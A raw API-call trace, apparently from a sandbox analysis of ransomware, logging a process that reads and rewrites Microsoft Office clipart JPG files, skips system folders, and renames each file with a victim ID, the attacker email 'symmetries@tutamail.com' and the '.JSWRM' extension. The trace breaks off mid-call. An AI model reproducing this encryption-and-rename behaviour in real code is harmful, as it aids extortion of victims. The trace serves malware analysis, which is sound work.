WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0089.790] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382927.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382927.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.791] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=129132) returned 1 [0089.791] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.791] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1f860) returned 0x24d210 [0089.792] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x1f860, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x1f860, lpOverlapped=0x0) returned 1 [0089.807] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.807] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x1f860, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x1f860, lpOverlapped=0x0) returned 1 [0089.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.808] CloseHandle (hObject=0x314) returned 1 [0089.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0089.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0089.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0089.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0089.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0089.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0089.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0089.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0089.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0089.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0089.809] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382927.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382927.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382927.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382927.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0089.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0089.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0089.810] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4c596d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf4c596d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf4c596d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1b83a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0382930.JPG", cAlternateFileName="")) returned 1 [0089.810] lstrcmpiW (lpString1="J0382930.JPG", lpString2=".") returned 1 [0089.810] lstrcmpiW (lpString1="J0382930.JPG", lpString2="..") returned 1 [0089.810] lstrcmpiW (lpString1="J0382930.JPG", lpString2="...") returned 1 [0089.810] lstrcmpiW (lpString1="J0382930.JPG", lpString2="windows") returned -1 [0089.810] lstrcmpiW (lpString1="J0382930.JPG", lpString2="recovery") returned -1 [0089.810] lstrcmpiW (lpString1="J0382930.JPG", lpString2="perflogs") returned -1 [0089.810] lstrcmpiW (lpString1="J0382930.JPG", lpString2="documents and settings") returned 1 [0089.810] lstrcmpiW (lpString1="J0382930.JPG", lpString2="$RECYCLE.BIN") returned 1 [0089.810] lstrcmpiW (lpString1="J0382930.JPG", lpString2="system volume information") returned -1 [0089.810] lstrcmpiW (lpString1="J0382930.JPG", lpString2="msocache") returned -1 [0089.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0089.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382930.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382930.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0382930.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0089.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0089.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382930.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382930.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0382930.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0089.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0089.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0089.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0089.811] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382930.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382930.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.812] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=112698) returned 1 [0089.812] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.812] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1b830) returned 0x24d210 [0089.813] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x1b830, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x1b830, lpOverlapped=0x0) returned 1 [0089.822] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.822] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x1b830, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x1b830, lpOverlapped=0x0) returned 1 [0089.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.824] CloseHandle (hObject=0x314) returned 1 [0089.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0089.824] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0089.824] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0089.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0089.824] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0089.824] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0089.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0089.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0089.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0089.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0089.824] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382930.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382930.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382930.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382930.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0089.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0089.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0089.825] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4c596d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf4c596d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf4c596d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1df43, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0382931.JPG", cAlternateFileName="")) returned 1 [0089.825] lstrcmpiW (lpString1="J0382931.JPG", lpString2=".") returned 1 [0089.825] lstrcmpiW (lpString1="J0382931.JPG", lpString2="..") returned 1 [0089.825] lstrcmpiW (lpString1="J0382931.JPG", lpString2="...") returned 1 [0089.825] lstrcmpiW (lpString1="J0382931.JPG", lpString2="windows") returned -1 [0089.825] lstrcmpiW (lpString1="J0382931.JPG", lpString2="recovery") returned -1 [0089.825] lstrcmpiW (lpString1="J0382931.JPG", lpString2="perflogs") returned -1 [0089.825] lstrcmpiW (lpString1="J0382931.JPG", lpString2="documents and settings") returned 1 [0089.825] lstrcmpiW (lpString1="J0382931.JPG", lpString2="$RECYCLE.BIN") returned 1 [0089.826] lstrcmpiW (lpString1="J0382931.JPG", lpString2="system volume information") returned -1 [0089.826] lstrcmpiW (lpString1="J0382931.JPG", lpString2="msocache") returned -1 [0089.826] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0089.826] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382931.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.826] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382931.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0382931.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.826] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0089.826] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0089.826] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382931.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.826] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382931.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0382931.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.826] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0089.826] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0089.826] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0089.826] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.826] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.826] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0089.826] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382931.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382931.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.827] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=122691) returned 1 [0089.827] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.827] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1df40) returned 0x24d210 [0089.828] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x1df40, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x1df40, lpOverlapped=0x0) returned 1 [0089.838] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.838] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x1df40, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x1df40, lpOverlapped=0x0) returned 1 [0089.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.839] CloseHandle (hObject=0x314) returned 1 [0089.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0089.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0089.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0089.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0089.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0089.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0089.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0089.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0089.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0089.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0089.840] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382931.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382931.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382931.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382931.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0089.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0089.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0089.841] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5aa7bb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf5aa7bb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf5aa7bb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x184d3, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0382938.JPG", cAlternateFileName="")) returned 1 [0089.841] lstrcmpiW (lpString1="J0382938.JPG", lpString2=".") returned 1 [0089.841] lstrcmpiW (lpString1="J0382938.JPG", lpString2="..") returned 1 [0089.841] lstrcmpiW (lpString1="J0382938.JPG", lpString2="...") returned 1 [0089.841] lstrcmpiW (lpString1="J0382938.JPG", lpString2="windows") returned -1 [0089.841] lstrcmpiW (lpString1="J0382938.JPG", lpString2="recovery") returned -1 [0089.841] lstrcmpiW (lpString1="J0382938.JPG", lpString2="perflogs") returned -1 [0089.841] lstrcmpiW (lpString1="J0382938.JPG", lpString2="documents and settings") returned 1 [0089.841] lstrcmpiW (lpString1="J0382938.JPG", lpString2="$RECYCLE.BIN") returned 1 [0089.841] lstrcmpiW (lpString1="J0382938.JPG", lpString2="system volume information") returned -1 [0089.841] lstrcmpiW (lpString1="J0382938.JPG", lpString2="msocache") returned -1 [0089.841] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0089.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382938.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382938.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0382938.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0089.841] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0089.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382938.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382938.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0382938.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0089.841] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0089.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0089.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.841] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0089.841] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382938.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382938.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.861] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=99539) returned 1 [0089.861] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x184d0) returned 0x24d210 [0089.862] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x184d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x184d0, lpOverlapped=0x0) returned 1 [0089.871] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.871] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x184d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x184d0, lpOverlapped=0x0) returned 1 [0089.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.872] CloseHandle (hObject=0x314) returned 1 [0089.872] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0089.872] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.872] 